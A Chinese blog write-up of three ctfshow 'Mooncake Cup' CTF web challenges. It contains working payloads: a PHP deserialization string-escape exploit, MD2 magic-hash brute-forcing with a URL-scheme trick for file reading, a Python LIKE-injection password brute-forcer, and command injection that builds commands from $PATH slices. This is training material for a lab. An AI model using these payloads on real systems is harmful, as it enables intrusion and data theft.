ctfshow web篇月饼杯

已于 2023-01-05 22:57:39 修改
阅读量424 收藏 4
点赞数 1
文章标签: web安全
于 2023-01-05 22:56:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_64297700/article/details/128566883
版权
文章介绍了三个CTF挑战,涉及反序列化漏洞利用、MD2哈希碰撞和SQL注入等技术。在第一个挑战中,通过字符逃逸构造序列化payload获取flag。第二个挑战中,利用MD2哈希碰撞找到b和c的值,并构造URL绕过限制获取flag。第三个挑战通过环境变量和Linux命令执行读取flag.php的内容。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

月饼杯

web1_此夜圆

  • 下载并打开index.php;
<?php
error_reporting(0);

class a{
	public $uname;
	public $password;
	public function __construct($uname,$password){
		$this->uname=$uname;
		$this->password=$password;
	}
	public function __wakeup(){
			if($this->password==='yu22x'){
				include('flag.php');
				echo $flag;	
			}
			else{
				echo 'wrong password';
			}
		}
	}
function filter($string){
    return str_replace('Firebasky','Firebaskyup',$string);
}

$uname=$_GET[1];
$password=1;
$ser=filter(serialize(new a($uname,$password)));
$test=unserialize($ser);
?>
  • 通过审计代码发现是反序列化,看到str_replace('Firebasky','Firebaskyup',$string);才反应过来,原来是反序列化字符串逃逸,分析一下大概意思就是当序列化结果里有Firebasky是,会被替换为Firebaskyup,多了两个字符;

在这里插入图片描述

  • 根据代码我们可以知道,当password==="yu22x"时,可以输出flag,构造序列化;

在这里插入图片描述

  • 我们需要逃逸的字符串是";s:8:"password";s:5:"yu22x";},通过strlen函数得出该逃逸字符串长度为30,由于str_replace替换会多出两个字符,而需要逃逸的字符串有30个,所以需要构造15个Firebasky来进行逃逸;(注:"是为了闭合前面)
<?php
class a{
	public $uname='FirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebasky";s:8:"password";s:5:"yu22x";}';
	public $password=1;
}

$ser=serialize(new a());
$test=str_replace('Firebasky','Firebaskyup',$ser); 
echo $test;

//结果: O:1:"a":2:{s:5:"uname";s:174:"FirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyupFirebaskyup";s:8:"password";s:5:"yu22x";}";s:8:"password";i:1;}
  • 反序列化时执行到第一个}就会结束反序列化,所以成功将";s:8:"password";s:5:"yu22x";}写进去了,构造payload,成功拿到flag;

Payload

	?1=FirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebasky";s:8:"password";s:5:"yu22x";}

在这里插入图片描述

如果还有不太理解字符逃逸的小伙伴,还可以参考一下这篇文章的字符逃逸哟;

web2_故人心

  • 打开发现还是一道代码审计题;
<?php
error_reporting(0);
highlight_file(__FILE__);
$a=$_GET['a'];
$b=$_GET['b'];
$c=$_GET['c'];
$url[1]=$_POST['url'];
if(is_numeric($a) and strlen($a)<7 and $a!=0 and $a**2==0){
    $d = ($b==hash("md2", $b)) && ($c==hash("md2",hash("md2", $c)));
    if($d){
             highlight_file('hint.php');
             if(filter_var($url[1],FILTER_VALIDATE_URL)){
                $host=parse_url($url[1]);
                print_r($host); 
                if(preg_match('/ctfshow\.com$/',$host['host'])){
                    print_r(file_get_contents($url[1]));
                }else{
                    echo '差点点就成功了!';
                }
            }else{
                echo 'please give me url!!!';
            }     
    }else{
        echo '想一想md5碰撞原理吧?!';
    }
}else{
    echo '第一个都过不了还想要flag呀?!';
}

  • 分析代码发现,需要绕过4个参数,先尝试绕过a,通过is_numeric函数检测$a的值,其次长度不能大于7,且a和a的平方都不能为0;

      绕过a: a=1e-162	//1e-162=1x10^(-162); 尝试后发现只要在-323到-162之间的都可以绕过;

  • 继续绕过b和c,在题目处发现了存在robots.txt,访问一下;

User=agent: *
Disallow:
Disallow: hinthint.txt

  • 访问hinthint.txt;

Is it particularly difficult to break MD2?!
I’ll tell you quietly that I saw the payoad of the author.
But the numbers are not clear.have fun~~~~
xxxxx024452 hash(“md2”,$b)
xxxxxx48399 hash(“md2”,hash(“md2”,$b))

  • 根据特性我们知道前面两个字符应该是0e,使用脚本得出b和c的值;
<?php
for ($i=100;$i<999;$i++){
    $b = "0e".$i."024452";
    if($b==hash("md2", $b)){
        echo $b;
    }
}
//b=0e652024452
echo "\n";
for ($i=1000;$i<9999;$i++){
    $c = "0e".$i."48399";
    if($c==hash("md2",hash("md2", $c))){
        echo $c;
    }
}
//c=0e603448399

	绕过b,c: b=0e652024452 c=0e603448399
  • 最后绕过url,由于完成了前面两个的绕过,所以提示我们flag在fl0g.txt中,分析代码发现是正则匹配,host中必须有ctfshow.com,尝试构造url=http://ctfshow.com/../../../../../fl0g.txt发现失败了,后来发现当php遇到不认识的协议就会当目录处理,所以构造;

Payload

	绕过url: url=Joker://ctfshow.com/../../../../../fl0g.txt
  • 输入4个参数值,成功拿到flag;

在这里插入图片描述

web3_莫负婵娟

  • 打开看到用户登录,右击查看源代码发现用户名和查询密码的sql语句;

在这里插入图片描述

	SELECT * FROM users where username like binary('$username') and password like binary('$password')
  • 猜测是like注入,like模糊查询可以使用%匹配多个字符,_匹配单个字符,测试后发现%被过滤了,使用_得出密码长度为32位,使用python脚本爆破出密码;
import requests

a="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
url = 'http://27b42a42-84f7-48a3-9c89-98ee4555daab.challenge.ctf.show/login.php' #需要修改处;
pwd = ''
for i in range(32):
    print('i = '+str(i+1),end='\t')
    for j in a:
        password = pwd + j + (31 - i) * '_'
        data = {'username':'yu22x','password':password}
        r = requests.post(url,data=data)
        if 'wrong' not in r.text:
             pwd += j
             print(pwd)
             break

	爆破出密码为: 67815b0c009ee970fe4014abaa3Fa6A0
  • 成功登录后,进入到下一关,发现是命令执行,尝试后发现把所有小写字母都ban了;

在这里插入图片描述

  • 根据提示可知:环境变量 + linux字符串截取 + 通配符,想到可以利用Linux的环境变量PATH来构造小写字母执行命令;

For example

在这里插入图片描述

  • 输入127.0.0.1;${PATH:5:1}${PATH:2:1}查询,也就是相当于执行ls命令;

在这里插入图片描述

  • 接下来需要读取flag.php,但是发现环境变量中没有t,查找资料后发现可以使用cat的兄弟,也就是nl命令来读取flag,其中nl在环境变量中为${PATH:14:1}${PATH:5:1},因为小写字母都被过滤了,但是通配符?没有,使用????.???来代替flag.php ,执行后发现没看到flag就离谱;

在这里插入图片描述

  • 一顿卧槽后,查看源代码后发现flag;

在这里插入图片描述
以上内容就是ctfshow web篇月饼杯的学习笔记,如有还不太理解或有其他想法的小伙伴们都可以私信我或评论区打出来哟,如有写的不好的地方也请大家多多包涵一下,我也会慢慢去改进和提高的,请各位小伙伴多多支持,走之前别忘了点个赞哟😁!

ctfshow 月饼
qq_45655564的博客
09-02 429
web1_此夜圆 一个简单的反序列化逃逸 <?php error_reporting(0); class a { public $uname; public $password; public function __construct($uname,$password) { $this->uname=$uname; $this->password=$password; } public function __wakeup() { if($this->pa
2021ctfshow月饼web
weixin_47813861的博客
09-22 1319
随便写写,欢迎师傅的意见与批评 eztp <?php namespace app\index\controller; class Index { public function index($run=[]) { highlight_file(__FILE__); echo '<h1>Welcome to CTFSHOW</h1></br>'; echo 'Powered by PHPthink5.
ctfshow web 月饼
m0_62422842的博客
06-10 617
刷题知识总结:php反序列化字符逃逸。php浮点数绕过。hash爆破。file_get_contents读取任意文件。like盲注,脚本编写。通过环境变量截取字符。
ctfshow-月饼
LYJ20010728的博客
06-15 708
web1_此夜圆web1_此夜圆考点思路Payloadweb2_故人心考点思路Payloadweb3_莫负婵娟考点思路Payload web1_此夜圆 考点 php反序列化字符逃逸 思路 观察 index.php 代码,很容易发现是php反序列化字符逃逸中字符增多的考点,我们要将password的值变为yu22x,从而达到包含 flag.php 的目的,我们需要逃逸的部分为 ";s:8:"password";s:5:"yu22x";},长度为30,所以我们需要15个 Firebasky来达到逃逸这部分
WebCTFSHOW 月饼 题解(全)
uuzeray的博客
05-10 942
是一个非负整数,表示提取子字符串的起始位置。[ ] 表示指定范围 ([a-f]) 或集合 ([abcdef]) 中的任何单个字符。[^] 不属于指定范围 ([a-f]) 或集合 ([abcdef]) 的任何单个字符。一眼八股,但小写字母都被waf掉了,用提示中的环境变量+linux字符串截取来构造。脚本爆可以0e绕过的值,$b要爆3位,$c要爆4位。中提取一个子字符串,并根据提供的参数进行操作。变量中的第3、第4和第5个字符组成的子字符串。是一个非负整数,表示提取的子字符串的长度。同于DOS命令中的?
ctfshow 2021月饼-web
Yasso的博客
10-22 784
web签到(md5弱类型) <?php //Author:H3h3QAQ include "flag.php"; highlight_file(__FILE__); error_reporting(0); if (isset($_GET["YBB"])) { if (hash("md5", $_GET["YBB"]) == $_GET["YBB"]) { echo "小伙子不错嘛!!flag给你了:" . $flag; } else { echo "偶吼
ctfshow_2021月饼记录
MiGooli的博客
09-21 1848
一、WEB 作为队内的web手,差点连签到题都做不出来,属实是拉大胯丢大人了 web签到 <?php //Author:H3h3QAQ include "flag.php"; highlight_file(__FILE__); error_reporting(0); if (isset($_GET["YBB"])) { if (hash("md5", $_GET["YBB"]) == $_GET["YBB"]) { echo "小伙子不错嘛!!flag给你了:" . $fla
ctfshow_月饼
qq_44657899的博客
07-01 514
文章目录0x010x03 web3_莫负婵娟 (LIKE盲注、$PATH环境变量截取字母) 0x01 0x03 web3_莫负婵娟 (LIKE盲注、$PATH环境变量截取字母) 在登录页面的源代码中可以看到一些提示 用户名为yu22x,查询语句为like,可以使用通配符%和_。 百分比(%)通配符允许匹配任何字符串的零个或多个字符。下划线_通配符允许匹配任何单个字符。 fuzz了一下,被过滤的有这些字符,%号被过滤了,我们可以使用_ 写个脚本测试一下密码长度 import requests heade
CTFSHOW 月饼 web
feng的博客
01-29 638
web1_此夜圆 <?php error_reporting(0); class a { public $uname; public $password; public function __construct($uname,$password) { $this->uname=$uname; $this->password=$password; } public function __wakeup()
ctfshow 月饼 re1_西北望乡】
chuxuezhewocao的博客
06-08 251
ctfshow 月饼
[ctf.show.reverse] 月饼 re1_西北望乡、re2_归心、re3_若无月
weixin_52640415的博客
04-21 1179
re1_西北望乡 主程序很容易看明白,格式是flag{....}长45,然后把3,6,13,36拿出来作为系数,这些字符每5个一组分别乘系数后的和给定了。然后就是怎么解了。 if ( strlen(flag) == 45 ) { v21[0] = flag[3]; v21[1] = flag[6]; v21[2] = flag[13]; v21[3] = flag[36]; v21[4] = 13; for ( i = 0; i < 5;
CTFshow月饼(第二届) 中秋快乐 部分wp
Nancy523的博客
09-21 2644
苟,都可以苟 只要我osint做的够快我就不会被刷掉.jpg 体验很好,下次还来( 目录 1、web web签到 直接贴脚本吧,web不太懂不解释 <?php $str="0e"; for($i=1;$i<=10000000000;$i++){ $md5 = $str.$i; if (hash("md5",$md5)==$md5){ echo $md5; break; ..
2021 ctfshow 月饼 pwn Moon_note
yongbaoii的博客
09-24 350
保护全开,没给libc。 没给libc真可谓。 菜单 create 设计的很有意思,申请的chunk实现了类似unsorted bin 的一个hash表。 chunk的结构是前16个字节是title,中间16个字节是链表,后八个字节是一会write的时候写内容的chunk地址。 write 就是申请一个chunk,写东西,地址放到上面create里面说的那个玩意里面。 但是只能写一次。 show 正常show delete free掉chunk,但是漏洞就在free掉那个wirte的chunk之后没有清.
ctfshow月饼 web_wp
西部壮仔的博客
11-11 451
web1_此夜圆 ​ 题目如下 <?php error_reporting(0); class a { public $uname; public $password; public function __construct($uname,$password) { $this->uname=$uname; $this->password=$password; } public function __wakeup() { if($this->passwo
ctfshow 月饼(第二届) 部分WriteUp
mumuzi的博客
09-21 3083
Misc 杂项签到 右键附件,从链接另存文件。然后用16进制编辑器或者你想用notepad也彳亍看文件尾,有一串base64,解码即可。 ctfshow{we1come_to_mooncake_cap} 有手就行 查看exif,有一串阿拉伯语,翻译过来是“你知道汉明码吗” 查看图片文件尾,发现一串数字 10110110111 然后随便找一看一下是怎么编码的,以及如何纠错的 https://blog.youkuaiyun.com/qq_19782019/article/details/87452394 例子他举的也
CTFshow月饼(第二届) 中秋快乐 套套去哪儿出题思路+解法
Nancy523的博客
09-21 1816
附件如上 题目名称:套套去哪儿 题目描述:套套在去一次旅游的路程中,在飞机上随手拍了这张照片,你能找出他在哪儿吗?(经过出题人的暴打,套套说这张照片是在2021年6月3号下午飞机航班“中途”拍的) 请找出套套在拍照时候飞机下方所在的城市市名+飞机航班号 例:ctfshow{厦门XB1145} Flag为:ctfshow{延安TV9817} WriteUp: 首先题目附件中给出的信息最直观的可以得到一串数字:B-6467 此处为考点1:飞机身上几种编号的代表含义...
CTF.show:web1_此夜圆
qq_46230755的博客
02-05 654
先看一下源码 <?php error_reporting(0); class a { public $uname; public $password; public function __construct($uname,$password) { $this->uname=$uname; $this->password=$password; } public function __wakeup() { if($this->password==='yu22
ctfshowweb月饼
最新发布
09-04
"CTFshowweb月饼"看起来像是网络安全领域的一个活动名称,其中“CTF”通常代表Capture The Flag(夺旗赛),这是一种网络安全竞赛,参与者需要通过解密、破解、网络攻防等方式完成挑战。"月饼"可能是该活动的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值